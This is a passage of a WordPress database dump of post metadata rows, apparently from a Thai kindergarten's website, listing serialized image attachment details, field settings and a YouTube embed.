(1284,418,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1208;s:6:\"height\";i:408;s:4:\"file\";s:44:\"2024/09/e24fdb867221495643d16cf69a56df03.jpg\";s:8:\"filesize\";i:103577;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"e24fdb867221495643d16cf69a56df03-300x101.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:101;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9441;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"e24fdb867221495643d16cf69a56df03-1024x346.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45939;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"e24fdb867221495643d16cf69a56df03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8774;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"e24fdb867221495643d16cf69a56df03-768x259.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32795;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:44:\"e24fdb867221495643d16cf69a56df03-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19678;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1286,420,'title_style','default'),
(1287,420,'_title_style','field_5d1a0217cf408'),
(1288,421,'title_style','default'),
(1289,421,'_title_style','field_5d1a0217cf408'),
(1290,422,'title_style','default'),
(1291,422,'_title_style','field_5d1a0217cf408'),
(1292,423,'title_style','default'),
(1293,423,'_title_style','field_5d1a0217cf408'),
(1295,19,'_oembed_e9c671d9e043303041f5666f0beaff01','{{unknown}}'),
(1296,426,'title_style','default'),
(1297,426,'_title_style','field_5d1a0217cf408'),
(1299,428,'title_style','default'),
(1300,428,'_title_style','field_5d1a0217cf408'),
(1305,19,'_oembed_1198da3d89b2e87f7f43981b02c362db','<iframe title=\"สุขาดี มีความสุข ร.ร.อนุบาลวัดพระโต\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/i-C4sNY7Mf8?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe>'),
(1306,19,'_oembed_time_1198da3d89b2e87f7f43981b02c362db','1751006832'),
(1307,432,'title_style','default'),
(1308,432,'_title_style','field_5d1a0217cf408'),
(1310,434,'title_style','default'),
(1311,434,'_title_style','field_5d1a0217cf408'),
(1313,436,'title_style','default'),
(1314,436,'_title_style','field_5d1a0217cf408'),
(1316,438,'title_style','default'),
(1317,438,'_title_style','field_5d1a0217cf408'),
(1318,439,'title_style','default'),
(1319,439,'_title_style','field_5d1a0217cf408'),
(1323,441,'_edit_lock','1727234132:2'),
(1324,441,'_generateblocks_dynamic_css_version','1.9.1'),
(1325,442,'_wp_attached_file','2024/09/461169913_122179718960202781_2068683679490867629_n.jpg'),
(1326,442,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2024/09/461169913_122179718960202781_2068683679490867629_n.jpg\";s:8:\"filesize\";i:272520;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"461169913_122179718960202781_2068683679490867629_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20047;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"461169913_122179718960202781_2068683679490867629_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143529;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"461169913_122179718960202781_2068683679490867629_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8197;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"461169913_122179718960202781_2068683679490867629_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150510;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"461169913_122179718960202781_2068683679490867629_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:252676;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"461169913_122179718960202781_2068683679490867629_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19080;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1329,441,'_edit_last','2'),
(1330,441,'title_style','default'),
(1331,441,'_title_style','field_5d1a0217cf408'),
(1332,441,'related',''),
(1333,441,'_related','field_603b51c3e183e'),
(1334,443,'title_style','default'),
(1335,443,'_title_style','field_5d1a0217cf408'),
(1336,443,'related',''),
(1337,443,'_related','field_603b51c3e183e'),
(1342,441,'_thumbnail_id','442'),
(1345,444,'_edit_lock','1727249402:2'),
(1346,445,'_wp_attached_file','2024/09/S__95092749_0.jpg'),
(1347,445,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:959;s:4:\"file\";s:25:\"2024/09/S__95092749_0.jpg\";s:8:\"filesize\";i:284743;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__95092749_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12860;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__95092749_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87686;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__95092749_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6512;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__95092749_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57459;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__95092749_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156112;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__95092749_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16756;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1350,444,'_generateblocks_dynamic_css_version','1.9.1'),
(1351,444,'_edit_last','2'),
(1354,444,'title_style','default'),
(1355,444,'_title_style','field_5d1a0217cf408'),
(1356,444,'related',''),
(1357,444,'_related','field_603b51c3e183e'),
(1358,446,'title_style','default'),
(1359,446,'_title_style','field_5d1a0217cf408'),
(1360,446,'related',''),
(1361,446,'_related','field_603b51c3e183e'),
(1364,444,'_thumbnail_id','445'),
(1370,448,'title_style','default'),
(1371,448,'_title_style','field_5d1a0217cf408'),
(1372,448,'related',''),
(1373,448,'_related','field_603b51c3e183e'),
(1374,449,'_edit_lock','1727249366:2'),
(1375,449,'_generateblocks_dynamic_css_version','1.9.1'),
(1376,450,'_wp_attached_file','2024/09/S__95092747_0.jpg'),
(1377,450,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:959;s:4:\"file\";s:25:\"2024/09/S__95092747_0.jpg\";s:8:\"filesize\";i:304222;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__95092747_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13509;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__95092747_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95989;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__95092747_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6808;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__95092747_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63074;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__95092747_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170752;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__95092747_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17870;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1380,449,'_thumbnail_id','450'),
(1381,449,'_edit_last','2'),
(1384,449,'title_style','default'),
(1385,449,'_title_style','field_5d1a0217cf408'),
(1386,449,'related',''),
(1387,449,'_related','field_603b51c3e183e'),
(1388,451,'title_style','default'),
(1389,451,'_title_style','field_5d1a0217cf408'),
(1390,451,'related',''),
(1391,451,'_related','field_603b51c3e183e'),
(1394,453,'_edit_lock','1727249592:2'),
(1395,453,'_generateblocks_dynamic_css_version','1.9.1'),
(1396,454,'_wp_attached_file','2024/09/S__95092754.jpg'),
(1397,454,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:959;s:4:\"file\";s:23:\"2024/09/S__95092754.jpg\";s:8:\"filesize\";i:317831;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__95092754-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14567;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__95092754-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97813;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__95092754-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6609;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__95092754-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64162;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__95092754-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:175650;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__95092754-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18624;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1400,453,'_thumbnail_id','454'),
(1401,453,'_edit_last','2'),
(1404,453,'title_style','default'),
(1405,453,'_title_style','field_5d1a0217cf408'),
(1406,453,'related',''),
(1407,453,'_related','field_603b51c3e183e'),
(1408,455,'title_style','default'),
(1409,455,'_title_style','field_5d1a0217cf408'),
(1410,455,'related',''),
(1411,455,'_related','field_603b51c3e183e'),
(1412,457,'_edit_lock','1727765914:2'),
(1413,458,'_wp_attached_file','2024/10/461415627_122180698514202781_2938126010588144011_n.jpg'),
(1414,458,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/10/461415627_122180698514202781_2938126010588144011_n.jpg\";s:8:\"filesize\";i:201600;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"461415627_122180698514202781_2938126010588144011_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15891;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"461415627_122180698514202781_2938126010588144011_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110300;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"461415627_122180698514202781_2938126010588144011_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6806;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"461415627_122180698514202781_2938126010588144011_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70572;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"461415627_122180698514202781_2938126010588144011_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197373;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"461415627_122180698514202781_2938126010588144011_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17524;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1415,459,'_wp_attached_file','2024/10/461609374_122180697116202781_2314377563164186579_n.jpg'),
(1416,459,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2024/10/461609374_122180697116202781_2314377563164186579_n.jpg\";s:8:\"filesize\";i:378848;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"461609374_122180697116202781_2314377563164186579_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23749;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"461609374_122180697116202781_2314377563164186579_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:193593;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"461609374_122180697116202781_2314377563164186579_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9863;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"461609374_122180697116202781_2314377563164186579_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:205975;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"461609374_122180697116202781_2314377563164186579_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:348262;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"461609374_122180697116202781_2314377563164186579_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23447;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1417,460,'_wp_attached_file','2024/10/461491731_122180699546202781_1978514125640280905_n.jpg'),
(1418,460,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/10/461491731_122180699546202781_1978514125640280905_n.jpg\";s:8:\"filesize\";i:305657;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"461491731_122180699546202781_1978514125640280905_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22999;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"461491731_122180699546202781_1978514125640280905_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:167114;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"461491731_122180699546202781_1978514125640280905_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9473;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"461491731_122180699546202781_1978514125640280905_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105654;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"461491731_122180699546202781_1978514125640280905_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:297041;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"461491731_122180699546202781_1978514125640280905_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22936;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1419,461,'_wp_attached_file','2024/10/461296346_122180699444202781_3345559820320118519_n.jpg'),
(1420,461,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/10/461296346_122180699444202781_3345559820320118519_n.jpg\";s:8:\"filesize\";i:341715;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"461296346_122180699444202781_3345559820320118519_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23951;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"461296346_122180699444202781_3345559820320118519_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:187086;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"461296346_122180699444202781_3345559820320118519_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10144;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"461296346_122180699444202781_3345559820320118519_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116090;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"461296346_122180699444202781_3345559820320118519_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:334029;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"461296346_122180699444202781_3345559820320118519_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24583;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1423,457,'_thumbnail_id','458'),
(1424,457,'_edit_last','2'),
(1427,457,'title_style','default'),
(1428,457,'_title_style','field_5d1a0217cf408'),
(1429,457,'related',''),
(1430,457,'_related','field_603b51c3e183e'),
(1431,462,'title_style','default'),
(1432,462,'_title_style','field_5d1a0217cf408'),
(1433,462,'related',''),
(1434,462,'_related','field_603b51c3e183e'),
(1435,463,'_edit_lock','1733974524:1'),
(1436,464,'_wp_attached_file','2024/10/461609374_122180697116202781_2314377563164186579_n-1.jpg'),
(1437,464,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:64:\"2024/10/461609374_122180697116202781_2314377563164186579_n-1.jpg\";s:8:\"filesize\";i:378848;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"461609374_122180697116202781_2314377563164186579_n-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23749;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"461609374_122180697116202781_2314377563164186579_n-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:193593;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"461609374_122180697116202781_2314377563164186579_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9863;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"461609374_122180697116202781_2314377563164186579_n-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:205975;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"461609374_122180697116202781_2314377563164186579_n-1-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:348262;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"461609374_122180697116202781_2314377563164186579_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23447;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1440,463,'_edit_last','1'),
(1443,463,'title_style','default'),
(1444,463,'_title_style','field_5d1a0217cf408'),
(1445,463,'related',''),
(1446,463,'_related','field_603b51c3e183e'),
(1447,465,'title_style','default'),
(1448,465,'_title_style','field_5d1a0217cf408'),
(1449,465,'related',''),
(1450,465,'_related','field_603b51c3e183e'),
(1451,463,'_thumbnail_id','464'),
(1454,2,'_edit_lock','1751009782:1'),
(1456,469,'_edit_lock','1749191725:1'),
(1457,470,'_wp_attached_file','2025/06/499660042_122228241086202781_2318108421499316578_n.jpg'),
(1458,470,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2025/06/499660042_122228241086202781_2318108421499316578_n.jpg\";s:8:\"filesize\";i:586673;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"499660042_122228241086202781_2318108421499316578_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22846;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"499660042_122228241086202781_2318108421499316578_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194263;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"499660042_122228241086202781_2318108421499316578_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9307;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"499660042_122228241086202781_2318108421499316578_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:204189;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"499660042_122228241086202781_2318108421499316578_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:353200;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"499660042_122228241086202781_2318108421499316578_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s